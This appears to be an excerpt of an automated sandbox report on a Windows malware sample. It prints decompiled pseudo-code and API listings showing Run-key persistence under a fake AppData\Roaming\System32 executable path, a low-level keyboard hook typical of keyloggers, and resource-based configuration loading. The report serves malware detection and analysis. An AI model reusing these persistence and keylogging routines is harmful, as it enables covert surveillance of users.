				void* _v56;
				char _v1080;
				void* _t36;
				signed int _t38;
				signed int _t42;
				int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t66;
				signed char* _t76;
				void* _t83;
				void* _t88;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_v8 = E00409D02( &_v12);
				_t51 =  *_v12 & 0x000000ff;
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2);
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
				_t89 = _t51 + _t20;
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
				E00402F9B( &_v1080, _v24, _t51);
				E0040309E( &_v1080,  &_v40, _v20, _v8); // executed
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}






















                                        0x0040982c
                                        0x0040983c
                                        0x00409842
                                        0x00409846
                                        0x0040984c
                                        0x00409853
                                        0x00409855
                                        0x00409855
                                        0x0040985a
                                        0x0040985d
                                        0x00409860
                                        0x00409867
                                        0x00409872
                                        0x0040987e
                                        0x00409887
                                        0x00409892
                                        0x0040989e
                                        0x004098a0
                                        0x004098a4
                                        0x004098aa
                                        0x004098aa
                                        0x004098b1
                                        0x004098be
                                        0x004098c6
                                        0x004098db
                                        0x004098e3
                                        0x004098f1
                                        0x004098fa
                                        0x00409907

                                        APIs
                                          • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                          • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                          • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                          • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        • malloc.MSVCRT ref: 00409846
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                        • malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                        • String ID:
                                        • API String ID: 531887698-0
                                        • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                        • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B7B9, Relevance: 10.5, APIs: 7, Instructions: 42registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
				long _t15;
				long _t18;
				void* _t21;
				int _t22;
				void* _t28;

				_t15 = RegCreateKeyW(_a4, _a8,  &_a8); // executed
				if(_t15 != 0) {
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
					_t17 = _t15 + _t15 + 2;
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t22 = 0;
					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17); // executed
					RegCloseKey(_a8); // executed
					if(_t18 == 0) {
						_t22 = 1;
					}
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return _t22;
				}
			}








                                        0x0040b7c6
                                        0x0040b7ce
                                        0x0040b81f
                                        0x0040b828
                                        0x0040b7d0
                                        0x0040b7d5
                                        0x0040b7db
                                        0x0040b7e3
                                        0x0040b7ea
                                        0x0040b7f6
                                        0x0040b801
                                        0x0040b809
                                        0x0040b80b
                                        0x0040b80b
                                        0x0040b810
                                        0x0040b81b
                                        0x0040b81b

                                        APIs
                                        • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7D5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7E3
                                        • RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                        • RegCloseKey.KERNELBASE(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B801
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 0040B81F
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 1037601705-0
                                        • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                        • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B708, Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
				char* _t13;
				long _t15;
				void* _t18;
				int _t19;
				void* _t25;

				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
				if(_t13 != 0) {
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t19 = 0;
					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
					RegCloseKey(_a8);
					if(_t15 == 0) {
						_t19 = 1;
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t19;
				}
			}








                                        0x0040b715
                                        0x0040b71d
                                        0x0040b76a
                                        0x0040b773
                                        0x0040b71f
                                        0x0040b724
                                        0x0040b72e
                                        0x0040b735
                                        0x0040b741
                                        0x0040b74c
                                        0x0040b754
                                        0x0040b756
                                        0x0040b756
                                        0x0040b75b
                                        0x0040b766
                                        0x0040b766

                                        APIs
                                        • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                        • RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                        • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 2159132150-0
                                        • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                        • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405532, Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E00405532(void* __ecx) {
				signed int _t8;
				WCHAR* _t9;
				long _t12;
				void* _t21;
				void* _t22;
				void* _t28;

				_t8 =  *0x41b988; // 0x989680
				_t9 = _t8 |  *0x41b98c;
				_t22 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0); // executed
						_t21 = _t9;
						if(_t21 == 0xffffffff) {
							 *((char*)(_t22 + 0x30)) = 0;
						} else {
							_t12 = GetFileSize(_t21, 0);
							_t28 = 0 -  *0x41b98c; // 0x0
							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
								 *((char*)(_t22 + 0x30)) = 1;
								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
									E00405D50(_t22);
								}
								Sleep(0x2710);
							}
							_t9 = FindCloseChangeNotification(_t21); // executed
						}
					} while ( *((char*)(_t22 + 0x30)) == 1);
					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
						return E00405180(_t22);
					}
				}
				return _t9;
			}









                                        0x00405532
                                        0x00405538
                                        0x00405540
                                        0x00405542
                                        0x0040554a
                                        0x0040554d
                                        0x00405562
                                        0x00405569
                                        0x0040556f
                                        0x00405574
                                        0x004055b6
                                        0x00405576
                                        0x00405578
                                        0x00405580
                                        0x00405586
                                        0x00405595
                                        0x00405599
                                        0x0040559d
                                        0x0040559d
                                        0x004055a7
                                        0x004055a7
                                        0x004055ae
                                        0x004055ae
                                        0x004055b9
                                        0x004055c2
                                        0x004055d6
                                        0x00000000
                                        0x004055de
                                        0x004055c2
                                        0x004055e6

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                        • CreateFileW.KERNELBASE(00000000), ref: 00405569
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                        • Sleep.KERNEL32(00002710), ref: 004055A7
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@ChangeCloseCreateFindNotificationSizeSleepV01@@
                                        • String ID:
                                        • API String ID: 3579047504-0
                                        • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                        • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412163, Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E00412163(intOrPtr _a4) {
				char _v5;
				char _v12;
				long _v16;
				char _v32;
				void* _v48;
				char _v80;
				short _v592;
				char* _t23;
				char* _t25;

				_v12 = 0x10;
				 *0x41c1e8(1,  &_v80,  &_v12); // executed
				_v16 = 0x100;
				GetUserNameW( &_v592,  &_v16); // executed
				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
				_t25 =  &_v32;
				L0041416A();
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}












                                        0x0041216f
                                        0x0041217d
                                        0x00412186
                                        0x00412195
                                        0x004121a5
                                        0x004121ae
                                        0x004121b9
                                        0x004121bd
                                        0x004121c9
                                        0x004121d4
                                        0x004121dd
                                        0x004121e7

                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                        • String ID:
                                        • API String ID: 3382107156-0
                                        • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                        • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412D56, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				void* _t15;
				int _t17;
				long _t19;
				long _t20;
				long _t22;
				long _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
				_t28 = _t15;
				if(_t28 != 0xffffffff) {
					if(_a16 != 1) {
						L8:
						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
						if(_t17 != 0) {
							_t24 = 1;
						}
						L10:
						CloseHandle(_t28);
						_t19 = _t24;
						goto L11;
					}
					_t20 = SetFilePointer(_t28, _t24, _t24, 2); // executed
					if(_t20 == 0xffffffff) {
						goto L10;
					}
					goto L8;
				} else {
					_t19 = 0;
					L11:
					return _t19;
				}
			}













                                        0x00412d5f
                                        0x00412d62
                                        0x00412d64
                                        0x00412d74
                                        0x00412d7b
                                        0x00412d66
                                        0x00412d67
                                        0x00412d6b
                                        0x00412d6c
                                        0x00412d6f
                                        0x00412d6f
                                        0x00412d67
                                        0x00412d93
                                        0x00412d99
                                        0x00412d9e
                                        0x00412da8
                                        0x00412dba
                                        0x00412dc6
                                        0x00412dce
                                        0x00412dd0
                                        0x00412dd0
                                        0x00412dd2
                                        0x00412dd3
                                        0x00412dd9
                                        0x00000000
                                        0x00412dd9
                                        0x00412daf
                                        0x00412db8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00412da0
                                        0x00412da0
                                        0x00412ddb
                                        0x00412dde
                                        0x00412dde

                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 00412DAF
                                        • WriteFile.KERNELBASE(00000000,40000000,?,?,00000000), ref: 00412DC6
                                        • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandlePointerWrite
                                        • String ID:
                                        • API String ID: 3604237281-0
                                        • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                        • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B522, Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                        • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                        • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 2462357041-0
                                        • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                        • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004052D5, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004052D5(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				struct HHOOK__* _t11;
				struct HHOOK__** _t14;

				_t14 = __ecx;
				 *0x41b9a8 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					_t11 = SetWindowsHookExA(0xd, E004052BA, 0, 0); // executed
					 *_t14 = _t11;
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}






                                        0x004052dd
                                        0x004052e1
                                        0x004052e9
                                        0x00405300
                                        0x0040530f
                                        0x00405315
                                        0x0040531f
                                        0x00000000
                                        0x0040531f
                                        0x004052eb
                                        0x004052f4
                                        0x004052fa
                                        0x004052fc
                                        0x004052fe
                                        0x00000000
                                        0x00000000
                                        0x004052fe
                                        0x0040532c

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchHookTranslateWindows
                                        • String ID:
                                        • API String ID: 1978648212-0
                                        • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                        • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040309E, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 2505548081-0
                                        • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                        • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B4C8, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
				int _v8;
				int _v12;
				int _t14;
				long _t16;
				long _t20;
				signed int _t21;

				_t14 = 4;
				_v8 = _t14;
				_v12 = _t14;
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
					_t21 = RegCloseKey(_a8); // executed
					return _t21 & 0xffffff00 | _t20 == 0x00000000;
				}
			}









                                        0x0040b4cf
                                        0x0040b4d0
                                        0x0040b4d3
                                        0x0040b4e7
                                        0x0040b4ef
                                        0x0040b521
                                        0x0040b4f1
                                        0x0040b505
                                        0x0040b510
                                        0x0040b51d
                                        0x0040b51d

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                        • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                        • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
